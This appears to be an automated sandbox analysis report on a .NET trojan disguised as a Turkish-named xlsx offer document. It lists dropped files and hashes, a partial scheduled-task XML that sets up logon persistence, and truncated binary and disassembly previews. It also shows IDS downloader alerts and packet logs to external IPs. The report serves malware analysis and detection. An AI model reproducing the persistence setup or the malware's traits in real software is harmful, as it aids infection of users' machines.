C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1ow2caw.1w2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fu4vlatk.dz3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0ewghyt.rk4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4vqduig.rrn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2ro0tgd.c0k.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdkzyv3j.i0x.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqrqawvp.mcx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1603
Entropy (8bit):	5.1311360692528805
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT3v
MD5:	F9609561E78DB7CBBD058C3A455961CB
SHA1:	59BD889F8C76EDCFAB72B4E3CF02914A2DFD4696
SHA-256:	906CD0BB10D5DE35C33D16A95704DDBA81D7E8D3F88A699E66DAC57411AF8867
SHA-512:	619AF7780291E716FF8EB4255C22EEBB96B64C01AFB1FFA1A5B4DE449CE04215B9C36998BF3CE0E73EA3AB8831BD26A46D06C0E22B133C6FE6CA7823E4C6D836
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1603
Entropy (8bit):	5.1311360692528805
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT3v
MD5:	F9609561E78DB7CBBD058C3A455961CB
SHA1:	59BD889F8C76EDCFAB72B4E3CF02914A2DFD4696
SHA-256:	906CD0BB10D5DE35C33D16A95704DDBA81D7E8D3F88A699E66DAC57411AF8867
SHA-512:	619AF7780291E716FF8EB4255C22EEBB96B64C01AFB1FFA1A5B4DE449CE04215B9C36998BF3CE0E73EA3AB8831BD26A46D06C0E22B133C6FE6CA7823E4C6D836
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	686592
Entropy (8bit):	7.9826379832319905
Encrypted:	false
SSDEEP:	12288:7nf0CC6f1ghqjmY+z40cZQT2R0Js0CI9KIvdosx6EJb5761F:7npC61lOz40gQT2SJM3+/pb5761
MD5:	2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
SHA1:	63918EF85E4EE9D01EDD4C0304E6F9682F90EE00
SHA-256:	C3BC0F624964EFBDB410648C80ED1357B28F293CE0D0C7602FCAE852E37AD918
SHA-512:	6B6B261E93450727198188C211FE1418F9BF2BABC02F47AE7797CAEDE6078F666EC38782C4BB3DE2D93D5D335BA8D27C8E198596754B1EC16583782BD37C0CD5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..g..............0..p..........R.... ........@.. ....................................@.....................................O....................................y..T............................................ ............... ..H............text...Xo... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B................1.......H.......<9...............g...............................................0..1........~.......o.........,...s.....~......o........+..&.(......B.(........}......{.....0...........(.............o....Z.(........(.......+..r.(....-.~.....(....o....+......0..X.......s....%..o.....%..o.....%...o.....%..$o.....%..Ho.....%..o.....%..$o..........s...........{...."..}.....~....*.0..m........s....}.....(........o.....+5..( .......(!....+...(......("...o#......%.Y......-....($..

C:\Users\user\AppData\Roaming\YzkHZRBcm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9826379832319905
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File size:	686'592 bytes
MD5:	2cc0d4388df2a7acfae0a9dc3cceb3b5
SHA1:	63918ef85e4ee9d01edd4c0304e6f9682f90ee00
SHA256:	c3bc0f624964efbdb410648c80ed1357b28f293ce0d0c7602fcae852e37ad918
SHA512:	6b6b261e93450727198188c211fe1418f9bf2babc02f47ae7797caede6078f666ec38782c4bb3de2d93d5d335ba8d27c8e198596754b1ec16583782bd37c0cd5
SSDEEP:	12288:7nf0CC6f1ghqjmY+z40cZQT2R0Js0CI9KIvdosx6EJb5761F:7npC61lOz40gQT2SJM3+/pb5761
TLSH:	0DE42305B714FD4BEE2F07F48CDFA6449A16916BCB21C94C9A2C28A55EFB2041353B9E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..g..............0..p..........R.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4a8f52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67038278 [Mon Oct 7 06:40:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa8efd	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaa000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa7904	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa6f58	0xa7000	96c901a996bd1c190d045b6c6c94fcd8	False	0.9856234796032934	data	7.986844435005259	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xaa000	0x5a4	0x600	21be40f2fc1313e9b49261bf8e62ab0b	False	0.4192708333333333	data	4.057251881026582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xc	0x200	3a3f54cfc8314b79017518344e239cc8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xaa090	0x314	data			0.43274111675126903
RT_MANIFEST	0xaa3b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T14:52:22.045890+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49722	132.226.247.73	80	TCP
2024-10-07T14:52:23.327263+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49722	132.226.247.73	80	TCP
2024-10-07T14:52:23.791314+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49740	188.114.96.3	443	TCP
2024-10-07T14:52:24.606098+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49744	132.226.247.73	80	TCP
2024-10-07T14:52:26.327433+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49758	132.226.247.73	80	TCP
2024-10-07T14:52:27.061563+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49758	132.226.247.73	80	TCP
2024-10-07T14:52:27.624268+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49776	188.114.96.3	443	TCP
2024-10-07T14:52:27.627534+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49775	188.114.96.3	443	TCP
2024-10-07T14:52:28.436531+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49783	132.226.247.73	80	TCP
2024-10-07T14:52:29.764691+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49796	132.226.247.73	80	TCP
2024-10-07T14:52:30.226508+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49798	188.114.96.3	443	TCP
2024-10-07T14:52:30.327723+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49800	188.114.96.3	443	TCP
2024-10-07T14:52:31.531374+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49812	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 14:52:21.137988091 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:21.143322945 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:21.143407106 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:21.143676996 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:21.149354935 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:21.797427893 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:21.803406000 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:21.808350086 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:22.005261898 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:22.045890093 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:22.055308104 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.055416107 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.055495977 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.063841105 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.063870907 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.748218060 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.748294115 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.753912926 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.753928900 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.754271984 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.826522112 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.871407986 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.958803892 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.958887100 CEST	443	49729	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:22.958964109 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.967751026 CEST	49729	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:22.971702099 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:22.977102041 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:23.182259083 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:23.185911894 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:23.185964108 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:23.186072111 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:23.186479092 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:23.186491966 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:23.327263117 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:23.640510082 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:23.643194914 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:23.643224001 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:23.791274071 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:23.791358948 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:23.791400909 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:23.792212009 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:23.794543982 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:23.795671940 CEST	49744	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:23.799736023 CEST	80	49722	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:23.799832106 CEST	49722	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:23.800517082 CEST	80	49744	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:23.802581072 CEST	49744	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:23.802640915 CEST	49744	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:23.807357073 CEST	80	49744	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:24.447212934 CEST	80	49744	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:24.448478937 CEST	49748	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:24.448575974 CEST	443	49748	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:24.448775053 CEST	49748	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:24.449050903 CEST	49748	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:24.449089050 CEST	443	49748	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:24.606097937 CEST	49744	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:24.892640114 CEST	443	49748	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:24.898387909 CEST	49748	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:24.898482084 CEST	443	49748	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:25.031671047 CEST	443	49748	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:25.032248020 CEST	443	49748	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:25.032326937 CEST	49748	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:25.032774925 CEST	49748	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:25.038789988 CEST	49754	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.043663025 CEST	80	49754	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:25.043740988 CEST	49754	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.043914080 CEST	49754	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.048831940 CEST	80	49754	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:25.225693941 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.230602026 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:25.230864048 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.231070042 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.235975027 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:25.713902950 CEST	80	49754	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:25.715217113 CEST	49762	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:25.715249062 CEST	443	49762	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:25.715431929 CEST	49762	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:25.718517065 CEST	49762	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:25.718534946 CEST	443	49762	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:25.780289888 CEST	49754	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.909573078 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:25.913847923 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:25.918852091 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:26.117898941 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:26.152400017 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.152515888 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.152596951 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.156739950 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.156764030 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.174084902 CEST	443	49762	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.175909996 CEST	49762	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.175939083 CEST	443	49762	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.326824903 CEST	443	49762	188.114.96.3	192.168.2.7
